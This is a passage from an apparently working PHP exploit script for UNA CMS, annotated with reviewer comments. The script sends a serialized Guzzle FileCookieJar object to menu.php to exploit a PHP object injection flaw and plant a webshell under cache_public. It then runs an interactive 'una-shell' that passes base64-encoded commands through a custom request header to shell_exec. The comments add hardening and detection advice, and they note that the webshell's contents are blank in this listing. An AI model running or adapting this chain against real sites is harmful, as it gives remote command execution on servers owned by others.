\n";
    print "\nExample....: php $argv[0] http://localhost/una/";
    print "\nExample....: php $argv[0] https://unacms.com/\n\n";
    die();
}
// NOTE(review): the usage block that closes above begins before this excerpt; only its tail is visible.

// ON_APACHE selects the extension of the file the chain writes under ./cache_public/:
// .phtml when true, .php otherwise.
// NOTE(review): presumably .phtml is chosen because an Apache config may block *.php in that
// directory while still mapping .phtml to the PHP handler; confirm against the target's config.
// Hardening: deny script execution for every PHP-mapped extension in cache/upload directories,
// not only *.php.
define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');

// Local stand-ins for Guzzle's cookie classes. Underscores replace the namespace separators so
// the classes can be declared here without Guzzle installed; only the property layout matters,
// because the object is serialized and never used locally.
// NOTE(review): as rendered in this listing the 'Value' entry is an empty string, so the bytes
// that would end up in the written file are not shown here.
class GuzzleHttp_Cookie_SetCookie
{
    private $data = ['Expires' => '', 'Value' => ''];
}

// In Guzzle, FileCookieJar persists its cookies to $filename when the object is destroyed; that
// write is the primitive this chain relies on (confirm against the Guzzle version bundled with
// the target). $storeSessionCookies = true is set alongside a cookie whose 'Expires' is empty,
// presumably so that a cookie without an expiry is still written.
class GuzzleHttp_Cookie_FileCookieJar
{
    private $cookies, $filename = SH_PATH, $storeSessionCookies = true;

    function __construct()
    {
        $this->cookies = [new GuzzleHttp_Cookie_SetCookie];
    }
}

$url = $argv[1];
$ch = curl_init();

// Serialize the stand-in object, then rewrite the class names to the real namespaced ones.
// Each replacement is the same length as the name it replaces (27 and 31 characters), so the
// length prefixes inside the serialized string stay valid.
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);

// Stage 1: POST to menu.php with the serialized object in profile_id.
// NOTE(review): this implies the sys_set_acl_level / SetAclLevel handler passes profile_id to
// unserialize(); that server-side code is not visible in this listing.
// Fix on the application side: treat profile_id as an integer and reject anything else; never
// call unserialize() on request data (use JSON, or pass ['allowed_classes' => false]).
// Detection: POST requests to menu.php with o=sys_set_acl_level whose profile_id is not numeric,
// in particular a URL-encoded serialized object naming GuzzleHttp\Cookie\FileCookieJar.
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Certificate and host-name verification are both switched off for this request.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));

print "\n[+] Performing PHP Object Injection";

// The response of the first request is discarded; whether it succeeded is only learned later,
// when the second stage does or does not return marker-delimited output.
curl_exec($ch); curl_close($ch);

print "\n[+] Launching shell\n";

// Stage 2: request the file at SH_PATH under the site root.
// Detection: a file named sh.php / sh.phtml appearing in cache_public, and requests to it that
// carry a "C:" request header holding base64 data. File-integrity monitoring on cache
// directories and logging of unusual request headers both surface this.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

// PHP source template sent in the "C" header: the command is base64-encoded into %s and its
// output is wrapped in '____' markers so it can be cut out of the HTTP response.
// NOTE(review): this implies the written file evaluates the decoded header value; that code is
// not shown in this listing. Disabling shell_exec via disable_functions limits this stage but
// does not address the object injection itself.
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";

// Read commands from STDIN until the operator types "exit".
while(1)
{
    print "\nuna-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    // The whole PHP snippet is base64-encoded again so it survives as a single header value.
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    // Print whatever sits between the two markers; no markers in the response means the file was
    // not written or is not executed as PHP, and the script stops.
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}